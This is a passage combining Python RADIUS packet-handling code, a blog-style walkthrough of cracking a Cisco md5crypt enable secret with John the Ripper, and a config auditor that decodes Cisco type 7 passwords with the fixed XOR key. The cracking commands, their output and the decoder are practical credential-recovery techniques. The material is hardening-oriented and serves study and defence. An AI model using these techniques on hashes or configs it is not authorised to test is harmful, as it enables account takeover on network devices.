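        out, prev = out + bytes(c ^ k for c, k in zip(chunk, key)), chunk
    return out.rstrip(b"\x00")


def attr(atype: int, value: bytes) -> bytes:
    return struct.pack("!BB", atype, len(value) + 2) + value


def build_access_request(ident, username, password, secret, nas_ip="127.0.1.1",
                         nas_port=0, authenticator=None) -> bytes:
    """Same attribute list radtest printed; Message-Authenticator is filled in last."""
    ra = authenticator or os.urandom(16)
    attrs = (attr(USER_NAME, username.encode())
             + attr(USER_PASSWORD, hide_password(password.encode(), secret, ra))
             + attr(NAS_IP_ADDRESS, socket.inet_aton(nas_ip))
             + attr(NAS_PORT, struct.pack("!I", nas_port))
             + attr(MESSAGE_AUTHENTICATOR, b"\x00" * 16))
    pkt = struct.pack("!BBH", ACCESS_REQUEST, ident, 20 + len(attrs)) + ra + attrs
    mac = hmac.new(secret, pkt, hashlib.md5).digest()   # HMAC-MD5 over packet with MA zeroed
    return pkt[:-16] + mac


def parse(pkt: bytes):
    code, ident, length = struct.unpack("!BBH", pkt[:4])
    attrs, pos = {}, 20
    while pos < length:
        atype, alen = pkt[pos], pkt[pos + 1]
        if alen < 2 or pos + alen > length:
            raise ValueError("malformed attribute")
        attrs.setdefault(atype, []).append((pos, pkt[pos + 2:pos + alen]))
        pos += alen
    return code, ident, pkt[4:20], attrs


def message_authenticator_ok(pkt: bytes, secret: bytes) -> bool:
    _, _, _, attrs = parse(pkt)
    if MESSAGE_AUTHENTICATOR not in attrs:
        return False
    pos, mac = attrs[MESSAGE_AUTHENTICATOR][0]
    zeroed = pkt[:pos + 2] + b"\x00" * 16 + pkt[pos + 18:]
    return hmac.compare_digest(hmac.new(secret, zeroed, hashlib.md5).digest(), mac)


def handle_access_request(pkt: bytes, secret: bytes, users: dict) -> int:
    """Server-side decision: 2 (Access-Accept) or 3 (Access-Reject), as radtest reported."""
    if not message_authenticator_ok(pkt, secret):
        return ACCESS_REJECT
    code, _, ra, attrs = parse(pkt)
    if code != ACCESS_REQUEST or USER_NAME not in attrs or USER_PASSWORD not in attrs:
        return ACCESS_REJECT
    name = attrs[USER_NAME][0][1].decode("utf-8", "replace")
    given = reveal_password(attrs[USER_PASSWORD][0][1], secret, ra)
    expected = users.get(name)
    if expected is None or not hmac.compare_digest(expected.encode(), given):
        return ACCESS_REJECT
    return ACCESS_ACCEPT
```

The User-Password attribute is only XORed with an MD5 keystream derived from the shared secret and the 16-byte Request Authenticator, and the Message-Authenticator is HMAC-MD5 keyed with that same secret, so anyone who can sniff the UDP exchange and guess the secret recovers every password (the all-zero Message-Authenticator radtest printed is the placeholder before the HMAC is filled in). testing123 is the stock localhost value in clients.conf: use a distinct strong secret per NAS, keep RADIUS on a management network or inside TLS/IPsec, and have the server require Message-Authenticator on every request.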












MD5 password cracking

John the Ripper

vs.

Cisco's enable secret (type 5, md5crypt)


$ sudo apt install john
Selecting previously unselected package john.
Preparing to unpack .../john_1.8.0-2_armhf.deb ...
Unpacking john (1.8.0-2) ...
Processing triggers for man-db (2.7.0.2-5) ...
Setting up john-data (1.8.0-2) ...
Setting up john (1.8.0-2) ...
# sh run | s secret
enable secret $1$sSWq$CGWilSWbR821tNBqcnFTo.

$ echo '$1$sSWq$CGWilSWbR821tNBqcnFTo.' > /home/pi/md5_hash

$ john /home/pi/md5_hash
Created directory: /home/pi/.john
Loaded 1 password hash (md5crypt [MD5 32/32])
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:16 11% 2/3 0g/s 1008p/s 1008c/s 1008C/s miamimiami
0g 0:00:00:24 16% 2/3 0g/s 1014p/s 1014c/s 1014C/s CHARLIE

cisco            (?)
1g 0:00:03:28 3/3 0.004807g/s 972.3p/s 972.3c/s 972.3C/s cisco
Use the "--show" option to display all of the cracked passwords reliably
Session completed

$ john /home/netmag/md5_hash
Created directory: /home/netmag/.john
Loaded 1 password hash (md5crypt [MD5 32/64 X2])
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 15% 2/3 0g/s 11887p/s 11887c/s 11887C/s 1chad..1chainsaw
cisco            (?) -- easy password done in 15secs
1g 0:00:00:15 3/3 0.06485g/s 13116p/s 13116c/s 13116C/s cisco..cisca
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Comparing John the Ripper on a Raspberry Pi and a laptop 

-- The Raspberry Pi 2 B+ is much slower than the laptop (i7 3.6 GHz, 8 GB RAM)
-- 15 s on the laptop against 3 min 28 s on the RPi for the easy password above

-- With more difficult / longer passwords it takes far longer: up to 25 h on the RPi compared to 13.5 h on the laptop

$ echo '$1$lzxg$Ny2blL8TiisWpTP6I//9f/' > /home/pi/md5_hash

RPi

0g 0:01:56:20 3/3 0g/s 1019p/s 1019c/s 1019C/s ashmer7
0g 0:01:56:24 3/3 0g/s 1019p/s 1019c/s 1019C/s aspladi


-- 10 hrs and still running on the Raspberry Pi

0g 0:10:35:38 3/3 0g/s 1010p/s 1010c/s 1010C/s booy6h
0g 0:11:01:19 3/3 0g/s 1010p/s 1010c/s 1010C/s mb48sp
0g 0:11:10:05 3/3 0g/s 1010p/s 1010c/s 1010C/s lugs35

-- and finally after 18 hrs I gave up... need to use a TACACS server :D

0g 0:16:42:11 3/3 0g/s 1011p/s 1011c/s 1011C/s b1a37d
0g 0:16:43:15 3/3 0g/s 1011p/s 1011c/s 1011C/s jrji1y
0g 0:17:47:19 3/3 0g/s 1012p/s 1012c/s 1012C/s rsl4lg
0g 0:17:49:00 3/3 0g/s 1012p/s 1012c/s 1012C/s hgiros
0g 0:17:49:59 3/3 0g/s 1012p/s 1012c/s 1012C/s noudir
0g 0:18:05:44 3/3 0g/s 1013p/s 1013c/s 1013C/s cd1buy
0g 0:18:05:47 3/3 0g/s 1013p/s 1013c/s 1013C/s cdm74s
Session aborted
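As an added example (mine, not John the Ripper's or Cisco's) that goes one step beyond the md5crypt case above: a small config auditor that classifies every credential line in a running config by how the secret is stored, decoding the reversible type 7 form on the spot. The config excerpt is constructed around the post's own enable secret hash; the type 9 value is a dummy placeholder, not a real hash, and the function names are mine.

```python
import re

# Fixed XOR key used by IOS "service password-encryption" (type 7).
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"

# Constructed running-config excerpt; the type 5 line is the one from the post,
# the type 9 value is a dummy placeholder.
SAMPLE_CONFIG = """\
enable secret $1$sSWq$CGWilSWbR821tNBqcnFTo.
enable password 7 094F471A1A0A
username admin privilege 15 password 0 cisco
username ops secret 9 $9$SALTSALTSALTSA$PLACEHOLDERPLACEHOLDERPLACEHOLDERPLACEHO
"""

LINE_RE = re.compile(
    r"^\s*(?P<cmd>enable secret|enable password|"
    r"username \S+(?: privilege \d+)? (?:secret|password))"
    r"\s+(?:(?P<type>\d+)\s+)?(?P<val>\S+)\s*$"
)


def decode_type7(encoded: str) -> str:
    """Type 7 is obfuscation, not encryption: two-digit key offset, then hex of plaintext XOR key."""
    seed = int(encoded[:2])
    data = bytes.fromhex(encoded[2:])
    return bytes(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)] for i, b in enumerate(data)).decode()


def infer_type(explicit, value: str) -> str:
    """Lines without an explicit type number are classified by the hash prefix."""
    if explicit is not None:
        return explicit
    for prefix, ptype in (("$1$", "5"), ("$8$", "8"), ("$9$", "9")):
        if value.startswith(prefix):
            return ptype
    return "0"


def verdict(ptype: str, value: str) -> str:
    if ptype == "0":
        return "weak: plaintext"
    if ptype == "7":
        return f"weak: type 7 is reversible, decodes to {decode_type7(value)!r}"
    if ptype == "4":
        return "weak: type 4, single unsalted SHA-256"
    if ptype == "5":
        return "weak: type 5 md5crypt (1000 MD5 rounds), dictionary-crackable"
    if ptype == "8":
        return "ok: type 8 PBKDF2-SHA256"
    if ptype == "9":
        return "ok: type 9 scrypt"
    return f"unknown type {ptype}"


def audit(config: str):
    """One (command, type, verdict) tuple per credential line found."""
    out = []
    for line in config.splitlines():
        m = LINE_RE.match(line)
        if m:
            ptype = infer_type(m["type"], m["val"])
            out.append((m["cmd"], ptype, verdict(ptype, m["val"])))
    return out
```

Type 5 is salted but only 1000 MD5 rounds deep, which is why a dictionary word fell in 15 s above, and type 7 is not a hash at all. On current IOS and IOS-XE releases use enable algorithm-type scrypt secret <password> (type 9) or algorithm-type sha256 (type 8), remove enable password and any type 7 entries, and keep the local account as a strong fallback behind central AAA (TACACS+), as the post concludes.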